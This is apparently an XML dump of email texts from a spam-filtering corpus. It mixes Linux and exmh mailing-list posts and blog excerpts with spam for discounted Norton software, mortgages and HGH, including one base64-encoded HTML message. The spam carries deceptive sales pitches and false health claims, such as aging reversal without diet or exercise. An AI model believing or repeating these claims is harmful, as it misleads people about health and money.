 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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You're signed up for the Reich Report!
</t>
  </si>
  <si>
    <t xml:space="preserve">SPAM: -------------------- Start SpamAssassin results ----------------------
 SPAM: This mail is probably spam.  The original message has been altered
 SPAM: so you can recognise or block similar unwanted mail in future.
 SPAM: See http://spamassassin.org/tag/ for more details.
 SPAM: 
 SPAM: Content analysis details:   (5.30 hits, 5 required)
 SPAM: INVALID_DATE       (1.6 points)  Invalid Date: header (not RFC 2822)
 SPAM: REMOVE_SUBJ        (1.7 points)  BODY: List removal information
 SPAM: SPAM_PHRASE_05_08  (0.7 points)  BODY: Spam phrases score is 05 to 08 (medium)
 SPAM:                    [score: 6]
 SPAM: SUPERLONG_LINE     (-2.2 points) BODY: Contains a line &gt;=199 characters long
 SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)
 SPAM: MISSING_MIMEOLE    (1.6 points)  Message has X-MSMail-Priority, but no X-MimeOLE
 SPAM: MISSING_OUTLOOK_NAME (1.7 points)  Message looks like Outlook, but isn't
 SPAM: 
 SPAM: -------------------- End of SpamAssassin results ---------------------
 *************************************
 *   Reich for Governor Committee    *
 *   Newsletter Sign-up Confirmation *
 *************************************
 Thank you for signing up for the Reich Report, the weekly newsletter of the Reich for Governor campaign. You can read our previous newsletter on our website at http://RobertReich.org/gov/Newsletter.asp . If you would like to volunteer for the campaign, please contact our volunteer coordinator, Meg Ansara, at Meg@RobertReich.org or call (617) 547-2206 x132. 
 Our headquarters is located at 625 Mount Auburn Street, near the Star Market in Cambridge.  We are open from 9 am to 9 pm Monday through Thursday, 9 am to 6 pm Friday, 10 am to 6 pm Saturday, and 12 noon to 8 pm on Sundays. We are a bus ride away from Harvard Square (bus #71 or #73) and parking is readily available in the back of the building. We encourage all Reich supporters to come to the headquarters for events, to volunteer for phone banking, or just to see how we operate. 
 We encourage you to forward this e-mail to your friends, family, and colleagues, and ask them to sign up for our newsletter at http://www.robertreich.org/gov/emailpage.asp . Help us start a 'virtual' campaign!
 If you do not want to receive future newsletters, please send an e-mail to newsletter@RobertReich.org with 'Remove' as the subject line. 
 -- Jesse Alan Gordon
 Technology Director
 Reich for Governor Committee
 Jesse@RobertReich.org
 *************************************
 *   Reich for Governor Committee    *
 *   P.O. Box 381483                 *
 *   Cambridge, MA 02238             *
 *   http://www.RobertReich.org      *
 *************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">rODbegbie wrote:
 &gt; I get the impression that Vipul &amp; co are deliberately trying to
 &gt; mislead users into downloading the dev code in order to get more
 &gt; unwitting test sites.
 Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
 intended.
 As the old maxim goes, "Never ascribe to malice that which can be equally
 explained by incompetence".
 I'll shut up now.
 rOD.
 --
 "Fast!  Fast!  Faster!  Bring the beef, you bastard,"
 cries Paula Abdul, "and don't forget the pasta!"
 &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: SYSTEMWORKS CLEARANCE SALE_ONLY $29.99                         12173
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"3" cellspacing=3D"3" width=3D"469" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"447"&gt;&amp;nbsp;
       &lt;table border=3D"1" width=3D"100%" bgcolor=3D"#FFFFFF" bordercolor=3D=
 "#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" align=3D"center"&gt;&lt;font face=3D"Impact" size=3D=
 "4" color=3D"#CC0000"&gt;ATTENTION:
             This is a MUST for &lt;u&gt;ALL&lt;/u&gt; Computer Users!!!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3" face=3D"Verdana"&gt;&lt;b&gt;&amp;nbsp;&lt;font=
  color=3D"#FFFFFF"&gt;*NEW
       - Special Package Deal!*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;table border=3D"8" width=3D"100%" height=3D"86" bgcolor=3D"#FFFFFF"=
  bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;font face=3D"=
 Verdana, Arial, Helvetica, sans-serif" color=3D"#000099" size=3D"5"&gt;&lt;b&gt;Nor=
 ton
             SystemWorks 2002 Software Suite&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F00"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; =
 - Feature-Packed Utilities&lt;br&gt;ALL
             for &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF00"&gt;=
 1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 00"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"115" bgcolor=3D"#000080=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"109"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D=
 "2" color=3D"#FFFF00"&gt;This Software Will:&lt;/font&gt;&lt;font face=3D"Tahoma" size=
 =3D"2" color=3D"#FFFFFF"&gt;&lt;br&gt;- Protect your
             computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt; viruses&lt;br&gt;- Help=
  secure your
             private &amp;amp; valuable information&lt;br&gt;- Allow you to transfer =
 files
             and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;- Backup your ALL your data=
  quick and
             easily&lt;br&gt;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;&lt;font=
  color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;Feature-Packed Utilities&lt;br&gt;&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt;
             &lt;/font&gt;&lt;u&gt;&lt;font color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;/u&gt;&lt;u&gt;&lt;font color=3D=
 "#000000"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000080"&gt; Great
             Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000"&gt; &lt;br&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;
             A&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font color=3D"#ff0000"&gt;$300+=
 &lt;/font&gt;  &lt;/font&gt;&lt;font color=3D"#000080"&gt; Combined Retail Value
             &lt;i&gt;YOURS&lt;/i&gt; for Only&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font col=
 or=3D"#ff0000"&gt;$29.99!&lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;font color=3D=
 "#000080"&gt;&amp;lt;Includes
             &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font color=3D"#0000=
 80"&gt; Shipping!&amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial, Helvetica, sans-serif"  c=
 olor=3D"#ffffff"&gt;Don't fall prey to destructive viruses
     or hackers!&lt;br&gt;Protect&amp;nbsp; your computer and your valuable  informat=
 ion
     and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"1" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#0000FF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFFFF"&gt;
           &lt;a style=3D"color: #FFFFFF; font-family: Verdana; font-size: 14p=
 t; font-weight: bold" href=3D"http://www.fastbizonline.com/systemworks1.ht=
 m"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"5"&gt;
       &lt;a style=3D"text-decoration: none; background-color: rgb(255,255,0);=
  color: #0000FF" href=3D"http://www.fastbizonline.com/systemworks1.htm"&gt;Cl=
 ick
       here for more information&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#fffff=
 f"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
       &lt;/font&gt;&lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D=
 "Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List&lt;br&gt;
       &amp;nbsp;Purchase Code # 312-1-010.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed
       from this list, please
     &lt;a href=3D"http://www.fastbizonline.com/removeme.html"&gt;
     &lt;font color=3D"#FFFFFF"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Neutrino and X-ray physicists win Nobel Prize
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8676018,1440/
 Date: Not supplied
 Pioneering contributions to astrophysics have provided 'two new windows on the 
 Universe'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wed. OSXCon Panel Discussion
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000213.html
 Date: 2002-10-02T10:09:11-08:00
 Which was the better UI? Mac OS 9? Mac OS X? Windows? Nobody can agree. Tim 
 O'Reilly didn't like Mac OS 9. He gets OS X. Traditional Mac users are a bit 
 annoyed by OS X. They think it's a...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You can gain from lowest interest rates in 30 years
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity is knocking. Why?
 Because mortgage rates are rising.
 As a National Lender, not a broker, we can
 guarantee you the lowest possible rate on your
 home loan.
 Rates may well never be this low again. This is
 your chance to secure a better future. You could
 literally save enough money to buy that new car
 you've been wanting or to take that special
 vacation. Why pay more than you have to pay?
 We can guarantee you the best rate and the best
 deal possible for you. But only if you act now.
 This is a free service. No fees of any kind.
 You can easily determine if we can help you in
 just a few short minutes. We only provide
 information in terms so simple that anyone can
 understand them. We promise that you won't need
 an attorney to see the savings.
 We offer both first and second home loans and we
 will be happy to show you why your current loan
 is the best for you. 0r why you should replace
 it.
 Once again, there's no risk for you. None at all.
 Take two minutes and use the link(s) below that
 works for you. Let us show you how to get more
 for yourself and your family. Don't let
 opportunity pass you by. Take action now.
 &lt;a href="http://n62.go2net.com/adclick?cid=180713&amp;site=dp&amp;cp=nbci&amp;clickurl=http://211.167.74.101/mortg/"&gt;Click_Here&lt;/a&gt;
 http://n62.go2net.com/adclick?cid=180713&amp;site=dp&amp;cp=nbci&amp;clickurl=http://211.167.74.101/mortg/
 Sincerely,
 Chalres M. Gillette
 MortCorp, LLC
 rpmmumwnzvrmtuqepbremaddardmkkksfpipttmsdocbmnbkghfqauxdoitvxdmvdazpibikzbfxporvaazcuttzzzzjxuitoysdfbyominmypxtuomobktfgqg
 __________________________________________________________________
 The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [fwd: error exmh 2.5 07/13/2001 ]
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --==_Exmh_9973050780
 Content-Type: text/plain; charset=us-ascii
 Chris,
 I think you are referring to a problem I noticed last October (see 
 attached email). If I remember correctly, the binding for SeditBeautify
 is being applied outside of the sedit window and that results in the 
 behavior observed.
 Kevin
 In message &lt;1027546301.610.TMDA@deepeddy.vircio.com&gt;, Chris Garrigues writes:
 &gt; 
 &gt; Am I the only one for whom typing control-L to the main window causes this 
 &gt; error?
 &gt; 
 &gt; I can't figure out why it occurs.
 &gt; 
 &gt; Chris
 &gt; 
 --==_Exmh_9973050780
 Content-Type: message/rfc822 ; name="5637"
 Content-Description: 5637
 Content-Disposition: attachment; filename="5637"
 Return-Path: exmh-workers-admin@spamassassin.taint.org
 Delivery-Date: Tue, 02 Oct 2001 15:02:08 -0600
 Received: from mhbs.lsil.com (mhbs.lsil.com [147.145.31.100])
 	by flytrap.co.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id PAA14805
 	for &lt;kchrist@flytrap.co.lsil.com&gt;; Tue, 2 Oct 2001 15:02:06 -0600 (MDT)
 Received: from mail2.lsil.com by mhbs.lsil.com with ESMTP for kchrist@lsil.com; Tue, 2 Oct 2001 14:02:04 -0700
 Received: from listman.spamassassin.taint.org (listman.spamassassin.taint.org [199.183.24.211])
 	by mail2.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id OAA15069
 	for &lt;kchrist@lsil.com&gt;; Tue, 2 Oct 2001 14:02:03 -0700 (PDT)
 Received: from listman.spamassassin.taint.org (localhost.localdomain [127.0.0.1])
 	by listman.redhat.com (Postfix) with ESMTP
 	id DFA943002F; Tue,  2 Oct 2001 17:02:01 -0400 (EDT)
 Delivered-To: exmh-workers@listman.spamassassin.taint.org
 Received: from mail.spamassassin.taint.org (mail.spamassassin.taint.org [199.183.24.239])
 	by listman.redhat.com (Postfix) with ESMTP id 309802F422
 	for &lt;exmh-workers@listman.redhat.com&gt;; Tue,  2 Oct 2001 17:01:02 -0400 (EDT)
 Received: (from mail@localhost)
 	by mail.redhat.com (8.11.0/8.8.7) id f92L12F21878
 	for exmh-workers@listman.redhat.com; Tue, 2 Oct 2001 17:01:02 -0400
 Received: from mail2.lsil.com (mail2.lsil.com [147.145.40.22])
 	by mail.redhat.com (8.11.0/8.8.7) with ESMTP id f92L11g21859
 	for &lt;exmh-workers@redhat.com&gt;; Tue, 2 Oct 2001 17:01:01 -0400
 Received: from mhbs.lsil.com (mhbs [147.145.31.100])
 	by mail2.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id OAA14865
 	for &lt;exmh-workers@redhat.com&gt;; Tue, 2 Oct 2001 14:00:57 -0700 (PDT)
 From: kchrist@lsil.com
 Received: from inca.co.lsil.com by mhbs.lsil.com with ESMTP for exmh-workers@spamassassin.taint.org; Tue, 2 Oct 2001 14:00:22 -0700
 Received: from flytrap.co.lsil.com (flytrap.co.lsil.com [172.20.3.234])
 	by inca.co.lsil.com (8.9.3/8.9.3) with ESMTP id PAA26097
 	for &lt;exmh-workers@redhat.com&gt;; Tue, 2 Oct 2001 15:00:21 -0600 (MDT)
 Received: from arrakis.co.lsil.com (arrakis [172.20.22.152])
 	by flytrap.co.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id PAA14673
 	for &lt;exmh-workers@redhat.com&gt;; Tue, 2 Oct 2001 15:00:19 -0600 (MDT)
 Received: from arrakis (localhost [127.0.0.1])
 	by arrakis.co.lsil.com (8.9.1b+Sun/8.9.1) with ESMTP id PAA16677
 	for &lt;exmh-workers@redhat.com&gt;; Tue, 2 Oct 2001 15:00:17 -0600 (MDT)
 X-Mailer: exmh version 2.5 07/09/2001 with nmh-1.0.4+dev
 To: exmh-workers@spamassassin.taint.org
 Subject: SeditBeautify bug
 Reply-To: Kevin.Christian@lsil.com
 Message-Id: &lt;16675.1002056416@arrakis&gt;
 X-Loop: exmh-workers@spamassassin.taint.org
 Sender: exmh-workers-admin@spamassassin.taint.org
 Errors-To: exmh-workers-admin@spamassassin.taint.org
 X-BeenThere: exmh-workers@spamassassin.taint.org
 X-Mailman-Version: 2.0.1
 Precedence: bulk
 List-Help: &lt;mailto:exmh-workers-request@spamassassin.taint.org?subject=help&gt;
 List-Post: &lt;mailto:exmh-workers@spamassassin.taint.org&gt;
 List-Subscribe: &lt;https://listman.spamassassin.taint.org/mailman/listinfo/exmh-workers&gt;,
 	&lt;mailto:exmh-workers-request@redhat.com?subject=subscribe&gt;
 List-Id: Discussion list for EXMH developers &lt;exmh-workers.spamassassin.taint.org&gt;
 List-Unsubscribe: &lt;https://listman.spamassassin.taint.org/mailman/listinfo/exmh-workers&gt;,
 	&lt;mailto:exmh-workers-request@redhat.com?subject=unsubscribe&gt;
 List-Archive: &lt;https://listman.spamassassin.taint.org/mailman/private/exmh-workers/&gt;
 Date: Tue, 02 Oct 2001 15:00:16 -0600
 MIME-Version: 1.0
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 It appears that the binding for SeditBeautify applies to
 more than just the sedit window. Since SeditBeautify assumes
 we are in a sedit window the routine fails. (Try typing
 ctrl-l over the main window to see what I mean).
 The quick fix for this is to make the ^l more restrictive. However, I'd
 suggest keeping things the way the are and extending ^l to be a
 highlight toggle. If the window is currently highlighted (sedit or msg)
 re-display without highlighting and vice versa.
 While I can hack tcl, hacking tk is another story. Translation: I can't 
 fix this bug myself. Any volunteers?
 Kevin
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
 --==_Exmh_9973050780--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Modem Problems
</t>
  </si>
  <si>
    <t xml:space="preserve">ive just gotton myself a modem (no its not a winmodem, yes im sure) it dials
 the internet grant using the RedHat PPP Dialer... and i can ping the server
 i dial into but i cant get any furthur than that server? any ideas?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: tell you a great new K26kT5buE4AdbAD2c
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_cFRm0wxfhQWISt2h0cpKwOo0
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_cFRm0wxfhQWISt2h0cpKwOo0AA"
 ------=_NextPart_cFRm0wxfhQWISt2h0cpKwOo0AA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9obGMubm8taXAu
 b3JnL2NuZ2lmL3lpZGlhbjIuZ2lmIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi95aWRp
 YW4yLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwczovL2JuYm4yMDAwLmRuczJnby5jb20+DQo8
 aW1nIHNyYz1odHRwOi8vd3d3MzAuYnJpbmtzdGVyLmNvbS9jbnNwcmluZy9saWtlL2JpZy5naWYg
 YWx0PWh0dHA6Ly93d3czMC5icmlua3N0ZXIuY29tL2Nuc3ByaW5nL2JpZy5naWY+DQo8L2E+DQoN
 CjxhIGhyZWY9aHR0cDovL2ZvcmV2ZXJzcC5ob3B0by5vcmcvemlyZWFsPg0KPGltZyBzcmM9aHR0
 cDovL3d3dzI2LmJyaW5rc3Rlci5jb20vc3ByaW5nY24vbGlrZS90aWFuYW5tZW4uanBnIGFsdD1o
 dHRwOi8vd3d3MjYuYnJpbmtzdGVyLmNvbS9zcHJpbmdjbi9saWtlL3RpYW5hbm1lbi5qcGc+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cDovL2V4YW0uaG9wdG8ub3JnL3ppcmVhbD4NCjxpbWcgc3JjPWh0
 dHA6Ly9wdWR1amlzaS50cmlwb2QuY29tL2xpa2UveHVlYW4uZ2lmIGFsdD1odHRwOi8vcHVkdWpp
 c2kudHJpcG9kLmNvbS9saWtlL3h1ZWFuLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vcm9j
 aW82My5ob3B0by5vcmcvZmxhc2g+DQo8aW1nIHNyYz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdp
 Zi9hbGxhY2NlcHQuanBnIGFsdD1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9hbGxhY2NlcHQu
 anBnPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1nIHNy
 Yz1odHRwOi8vaGxjLm5vLWlwLm9yZy9jbmdpZi9zaG91amllLmpwZyBhbHQ9aHR0cDovL2hsYy5u
 by1pcC5vcmcvY25naWYvc2hvdWppZS5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly90a3Rr
 LnN5dGVzLm5ldD4NCjxpbWcgc3JjPWh0dHA6Ly9mbGRmaXNnb29kLnRyaXBvZC5jb20vbGlrZS90
 YWl3YW4uZ2lmIGFsdD1odHRwOi8vZmxkZmlzZ29vZC50cmlwb2QuY29tL2xpa2UvdGFpd2FuLmdp
 Zj4NCjwvYT4=
 ------=_NextPart_cFRm0wxfhQWISt2h0cpKwOo0AA--
 ------=_NextPart_cFRm0wxfhQWISt2h0cpKwOo0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Harri wrote :
 &gt; &gt; You can't get the file index from here either?
 &gt; &gt; http://apt.nixia.no/apt/files/
 &gt; 
 &gt; The requested URL /apt/files/ was not found on this server.
 Very strange then : It works fine from here, even shift-reloading and with
 no proxy whatsoever!
 &gt; &gt; During the past few days, I've experienced connection problems with
 &gt; &gt; that site from time to time, but for me right now it's working.
 &gt; 
 &gt; Maybe it's temporary :-/
 If you need another apt repository with Red Hat Linux 7.2 files, there are
 a few others. See : http://freshrpms.net/apt/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</si>
  <si>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RE: [ILUG] What HOWTOs for SOHO system
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Dermot, if have a look at one of the dists. like www.smoothwall.org, it
 will save you lots of time and effort, and should do eveything you want.
 Justin
 &gt; -----Original Message-----
 &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
 &gt; Dermot Daly
 &gt; Sent: Monday, September 02, 2002 11:46 AM
 &gt; To: ilug@linux.ie
 &gt; Subject: [ILUG] What HOWTOs for SOHO system
 &gt;
 &gt;
 &gt; Hi All,
 &gt; I'm trying to set up the following:
 &gt;
 &gt; 1. A Linux server running with a modem for internet connectivity and an
 &gt; ethernet card for LAN connectivity
 &gt; 2. Other LAN pcs with ethernet cards, using the Linux server for
 &gt; DNS/DHCP etc.
 &gt;
 &gt; Basically, I want to route any non LAN traffic through the ppp0.
 &gt;
 &gt; I've got some of the way, but like a similar post earlier about modem
 &gt; problems, when I am connected to the internet with eht0 up, the routing
 &gt; is all incorrect and noting goes out through ppp0 (eh0 must be the
 &gt; default route or something).
 &gt;
 &gt; Is there standard "out of the box" Linux tools that will carry out
 &gt; portmapping on behalf of the LAN PCs ?  (I'm planning on non routable
 &gt; addresses 192.168.x.x for the LAN, routed outwards via the ppp0
 &gt; interface).
 &gt;
 &gt; Can someone point me at the right HOWTOs or routing documentation I need
 &gt; to follow ?
 &gt; Thanks,
 &gt; Dermot.
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 &gt;
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.post-gazette.com/columnists/20020905brian5.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Catching up
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#catching_up
 Date: 2002-10-03T22:03:04-05:00
 - _Phil Ringnalda_: Hey Radio, this PRE's for you[1]. &amp;#8220;You did update 
 Radio.root after yesterday's fix for the double-decoding bug in the aggregator, 
 didn't you?&amp;#8221; 
 - _Brad Choate_: Sanitize Plugin[2]. &amp;#8220;Sanitize is a Movable Type plugin 
 that allows you to clean HTML and other markup that might exist in an comment 
 entry.&amp;#8221; 
 - _Scott Ambler_: The Process of Database Refactoring[3] [via John Beimler[4]] 
 &amp;#8220;A database refactoring is a simple change to a database schema that 
 improves its design while retaining both its behavioral and informational 
 semantics.&amp;#8221; 
 - _Mac OS X Hints_: Convert Windows Outlook mail to Mail.app[5]. 
 &amp;#8220;Converting the corporate Windows user who has all their old email in 
 .pst files for years back? Help them on their way by getting their mail out of 
 the proprietary .pst format and into standards based mbox format.&amp;#8221; 
 - _Shelley Powers_: RDF Query-o-matic Light[6] and RDF Query-o-matic Light 
 explained[7]. &amp;#8220;I slaved away this afternoon, persevering in my work in 
 spite of numerous obstacles (sunshine, cat on lap, languor) to bring you RDF 
 Query-o-Matic Light.&amp;#8221; 
 - _Bill Kearney_: RDF.root[8]. &amp;#8220;This is a tool for Radio Userland. Using 
 it will allow your Radio8 install to produce RSS-1.0 XML feeds.&amp;#8221; 
 - _Paul Ford_: Borrowing a car[9]. &amp;#8220;Give me a turkey sandwich.&amp;#8221; 
 [1] http://philringnalda.com/archives/002337.php
 [2] http://www.bradchoate.com/past/mtsanitize.php
 [3] http://www.agiledata.org/essays/databaseRefactoring.html
 [4] http://john.beimler.org/archives/000058.html
 [5] http://www.macosxhints.com/article.php?story=2002100306134721
 [6] http://weblog.burningbird.net/class_rdql/query.htm
 [7] http://weblog.burningbird.net/archives/000568.php
 [8] http://www.ideaspace.net/users/wkearney/misc/radio/radio8/rdf/current/
 [9] http://ftrain.com/second_toothpaste.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] Body Test Question /d ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Suppose I created a rule that was in this form:
 body RULE_NAME /text to delete/d
 Would the "/d" delete this text from the body and mask it from the rest of the 
 rules? If so - I'm thinking about applying it to Yahoo and SN and Juno ads so 
 that FPs are reduced.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</si>
  <si>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
 In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:
 &gt;If we're willing to count artificial
 &gt;selection as genetic engineering, 
 it's engineering that uses the general mechanism of genetics (inheritance of 
 traits) without understanding the specific mechanisms (genes, DNA, etc.). 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do it now , you'll be hot this summer
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://66.231.133.205/hgh/index.html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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
